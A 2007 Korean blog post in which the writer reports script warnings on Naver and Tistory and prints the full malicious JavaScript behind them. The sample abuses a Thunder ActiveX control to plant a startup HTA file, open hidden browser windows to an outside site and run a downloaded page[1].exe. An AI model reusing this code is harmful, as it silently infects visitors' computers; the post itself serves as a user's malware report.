마전에 인터넷 익스플로러를 실행시켜서 네이버에 접속을 했는데 갑자기 스크립트 경고가 나왔습니다. 일단 다운 받기하고 열기가 있어서 다운을 받아 보니 js(java script)파일이네요 내용을 봐서 대충 뭐 URL을 찾아봤더니 http://news.163-stv.com/page/image/Downer.html 의 주소가있어서 대충 뉴스가 있는 것을 보니 네이버에 메인화면엔 뉴스가 나오니까 하고 그냥 넘어갔습니다.


늘 다른 사이트를 열었는데 다시 스크립트 경고가 나오네요 이번엔 네이버도 아니구 티스토리 인지라 무엇인가 이상해서 다시 전에 받아뒀던 스크립트 파일을 열어보았습니다. 익스플로러를 이용해서 페이지를 생성하고 하는 악성코드였네요 코드 내용은 아래와 같아요


var Good_fan = null;

function shit()

{

try{Good_fan = new ActiveXObject("\x54\x68\x75\x6E\x64\x65\x72\x53\x65\x72\x76\x65\x72\x2E\x77\x65\x62\x54\x68\x75\x6E\x64\x65\x72\x2E\x31");}

catch(e){return;}

var vip;

vip="<script defer> var shell=\"

<html>

<body>

<script>

window.moveTo(4000,4000);window.resizeTo(0,0);

var shell=new ActiveXObject(\\\"wscript.shell\\\");

shell.Run(\\\"C:\\\\\\\\Progra~1\\\\\\\\Intern~1\\\\\\\\IEXPLORE.EXE http://news.163-stv.com/page/image/Downer.html\\\",0,0);

function runmm(){var path=shell.SpecialFolders(\\\"MyDocuments\\\");

var china=path.substring(0,path.lastIndexOf(\\\"\\\\\\\\\\\"));

china+=\\\"\\\\\\\\Local Settings\\\\\\\\Temporary Internet Files\\\\\\\\Content.IE5\\\\\\\\\\\";

var sp=new ActiveXObject(\\\"shell.application\\\");

var chenzi=sp.NameSpace(china);

for(i=0;

i<chenzi.Items().Count;

i++){var Folder=chenzi.Items().Item(i).path;Folder+=\\\"\\\\\\\\page[1].exe\\\";

try{shell.Exec(Folder);

}catch(e){};

}window.close();

};

shell.Run(\\\"cmd.exe /c tree c:\\\\\\\\ /f\\\",0,1);

runmm();

<\\/script>

</body>

</html>\";

var love = new ActiveXObject(\"ADODB.Recordset\");

love.Fields.Append(\"love\", 200, 3000);love.Open();

love.AddNew();

love.Fields(\"love\").Value=shell;love.Update();

love.Save(\"C:\\\\Documents and Settings\\\\All Users\\\\「역迦」꽉데\\\\넋埼\\\\폘땡\\\\Thunder.hta\",0);

love.Close();</script>";

        var ret=Good_fan.AddCateogry(vip);

        Good_fan.SetBrowserWindowSize(0,0,400,300);

        var strps = Good_fan.GetServerPath();

        strps = strps.substr(0, strps.length-1);

        strps+="\\page\\index.htm";

        Good_fan.SetBrowserWindowData(strps,"love");

        Good_fan.HideBrowserWindow(1);

        return;

}


단 위에 있는 URL에 중국어 폰트가 설치 되지 않아서 문자는 나오지 않지만 중국어가 짐작되는 이상한 사이트로 연결 되는군요 내용을 스크립트 내용두 자세히는 모르겠지만 확실히 악성 코드 같군요


2007.09.18 -프미케-

+ Recent posts